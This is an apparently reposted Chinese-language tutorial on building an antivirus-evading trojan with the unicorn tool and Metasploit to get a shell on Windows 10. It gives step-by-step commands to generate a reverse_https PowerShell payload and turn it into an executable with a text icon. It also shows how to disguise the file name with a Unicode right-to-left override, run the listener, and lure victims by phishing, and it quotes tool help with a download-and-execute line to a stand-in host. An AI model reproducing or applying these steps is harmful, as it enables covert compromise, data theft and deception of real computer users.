实战: unicorn生成免杀木马,绕过win10防火墙和windows defender
实战: unicorn生成免杀木马,绕过win10防火墙和windows defender
- 简介
- 原理
- 步骤
- 攻击
- 总结
简介
随着操作系统的安全等级越来越高,对能免杀,无视防火墙的木马需求也越来越高,目前市面上主流工具有WinPaylods, Veil v3和TheFatRat,这里介绍一个开源工具unicorn。原文地址:
https://null-byte.wonderhowto.com/how-to/hacking-windows-10-create-undetectable-payload-part-1-bypassing-antivirus-software-0185055/
原理
通过开源工具生成MSF payload,伪装成TXT在目标机上执行。
步骤
卸载原版MSF:
sudo apt-get remove metasploit-framework
安装MSF最新版
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
安装unicorn:
git clone https://github.com/trustedsec/unicorn
cd unicorn/
./unicorn.py --help-------------------- Magic Unicorn Attack Vector v3.1 -----------------------------Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris GatesHappy Magic Unicorns.Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
生成payload:
./unicorn.py windows/meterpreter/reverse_https <ATTACKER-IP-ADDRESS> <PORT>
注意把ATTACKER-IP-ADDRESS和PORT换成攻击服务器的地址和端口,这里端口选用443,用反向HTTPS的payload。
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...,///,//___ /| |//`__/\_ --(/|___/-/\|\_-\___ __-_`- /-/ \.|\_-___,-\_____--/_)' ) \\ -_ / __ \( `( __`\|`\__| |\)\ ) /(/|,._____., ',--//-| \ | ' // __. \, / /,---| \ // / _. \ \ `/`_/ _,' | || | ( ( \ | ,/\'__/'/ | || \ \`--, `_/_------______/ \( )/| | \ \_. \, \___/\| | \_ \ \ \\ \ \_ \ \ / \\ \ \._ \__ \_| | \\ \___ \ \ | \\__ \__ \ \_ | \ || \_____ \ ____ | || \ \__ ---' .__\ | | |\ \__ --- / ) | \ /\ \____/ / ()( \ `---_ /|\__________/(,--__ \_________. | ./ || \ \ `---_\--, \ \_,./ || \ \_ ` \ /`---_______-\ \\ /\ \.___,`| / \ \\ \\ | \_ \| \ ( |: |\ \ \ | / / | ;\ \ \ \ ( `_' \ |\. \ \. \ `__/ | |\ \ \. \ | |\ \ \ \ ( )\ | \ | | || \ \ \ I `( __; ( _; ('-_';|___\ \___: \___:aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDaveHappy Magic Unicorns.[********************************************************************************************************]-----POWERSHELL ATTACK INSTRUCTIONS----Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.Note that you will need to have a listener enabled in order to capture the attack.[*******************************************************************************************************][*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
会在unicorn目录下生成两个文件: unicorn.rc和powershell_attack.txt,后者是我们需要在目标机上运行的。
用winSCP把powershell_attack.txt保存到本地,转成bat格式,然后下载win10的icon图标:
git clone 'https://github.com/B00merang-Project/Windows-10-Icons'
这里选择Windows-10-Icons/256x256/mimetypes/ 下的text-x-generic.png
去https://convertico.com/网站转化PNG图片为ICON,然后打开BAT2EXE转换器,打开powershell_attack.bat然后在顶部加上notepad:
保存为windows 64位invisible的text.exe,然后伪装文件后缀名。
先把文件名改为texttxt.exe, 然后去https://unicode-table.com/en/202E/复制倒写unicode,文件名就变成了textexe.txt,但实际是一个可执行文件,这招能骗过开启文件后缀名显示的目标机用户。
攻击
ssh进云服务器,然后:
sudo msfconsole -r unicorn/unicorn.rc
运行自动攻击脚本:
然后引诱目标机运行textexe.txt:
成功建立session,这时候注意目标机防火墙全开,windows defender开:
看到了吧,但是仍然可以无视~~,选择sessions -i 1和目标机建立连接:
发现没有command,这是因为MSF升级过后,默认没有加载stdapi,输入:
load stdapi
然后就可以拿到shell了:
是不是很神奇,接下来干什么我就不多说了~~
总结
这种办法仍然需要目标机打开你的文件, 因此实际可以用钓鱼邮件的形式远程引诱目标机打开txt或者是图片。这种办法还是有明显的防范措施的,即留心文件后缀名前的那行字,如果是exe/bat那就要格外小心。最后提醒读者遵纪守法,本文对所产生后果概不负责。
实战: unicorn生成免杀木马,绕过win10防火墙和windows defender相关推荐
- Veil生成免杀payload 渗透win10 获取靶机shell
一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134 靶机:win10 192.168.115.1 二:Veil下载.安装.使用 kali里默认没有安装Veil,我们通过 ...
- 使用Shecodject生成免杀木马
文章目录 安装 使用 安装 git clone https://github.com/TaroballzChen/Shecodject.git cd Shecodject cd setup pytho ...
- Web渗透之MSF框架——msfvenom与免杀木马制作
文章目录 生成常见的反向连接木马 反向连接的优势: Windows: Linux: MAC: PHP: Asp: Aspx: msfvenom参数介绍 生成免杀木马 360免杀木马 腾讯管家免杀木马 ...
- 绕过杀毒软件,免杀木马制作
绕过杀毒软件,免杀木马制作(以AVG Anti Spyware杀毒软件为例) 一.将Sever.exe打开,分块生成100个文件 二.使用AVG Anti Spyware查杀生成的文件,再二次处理,重 ...
- PowerShell脚本免杀/bypass/绕过杀毒软件
项目地址:https://github.com/the-xentropy/xencrypt 原文链接:http://caidaome.com/?post=246 Xencrypt是一个PowerShe ...
- 内网后渗透,生成免杀后门!!
大家好,初来CSDN请大家多多关注.今天给大家带来的是后内网渗透---免杀木马生成!! 经过本人的一段时间研究终于研究出了一个过火绒等免杀后门,过程有点复杂,待我细细道来. 一.在自己公网服务器上面装 ...
- 利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑
前言:常规使用meterpreter制作木马时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀木马. 首先安装Venom Venon克隆地址:https://gi ...
- Metasploit+python生成免杀exe过360杀毒
Metasploit+python生成免杀exe过360杀毒 1在kali下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reve ...
- 偷工减料制作自己的免杀木马 6月11日更新(秒杀主流11款杀软)
很多新手在为能有一个免杀木马头疼,也相信很多人在饭客论坛上等待别人更新免杀,可是刚拿到手不久就又被杀了,呵呵,这里告诉大家一个小秘密,偷工减料得到免杀木马噢,而且不会被杀... 饭客论坛经常更新免杀, ...
最新文章
- 用tcc编译一个c语言写的简单代码hello world
- 3.9 训练一个 Softmax 分类器
- CentOS7下安装达梦数据库的步骤
- fukk _GNU_SOURCE __USE_GNU
- 消耗报表数据库呈现了流动变乱的回滚段破损(三)
- 【COCOS2DX-LUA 脚本开发之十二】Hybrid模式-利用AssetsManager实现在线更新脚本文件lua、js、图片等资源(免去平台审核周期)...
- Undefined variable 'raw_input'pylint(undefined-variable)
- 面试java回答优缺点_面试时被问“你有什么优缺点”应该怎么回答?
- 打狗棒法之:Cknife(C刀)自定义模式秒过安全狗(二)
- java偏向锁_Java锁事之偏向锁
- Impala SQL语句 COMPUTE STATS
- OKhttpclient 使用代理访问服务
- UCK区块链微课堂—公钥私钥,数字资产安全性的两把金钥匙
- 【无人机 学习笔记 2】无人机导航制导与控制
- 商标变更的重要性不及时变更的损失
- Linux-dd命令
- 程序员生存定律-六个程序员的故事(2) .
- Qt官方示例:Fridge Magnets Example(冰箱贴)
- [HTML5]配置Ngnix服务器支持manifest
- java Swing QQ登陆界面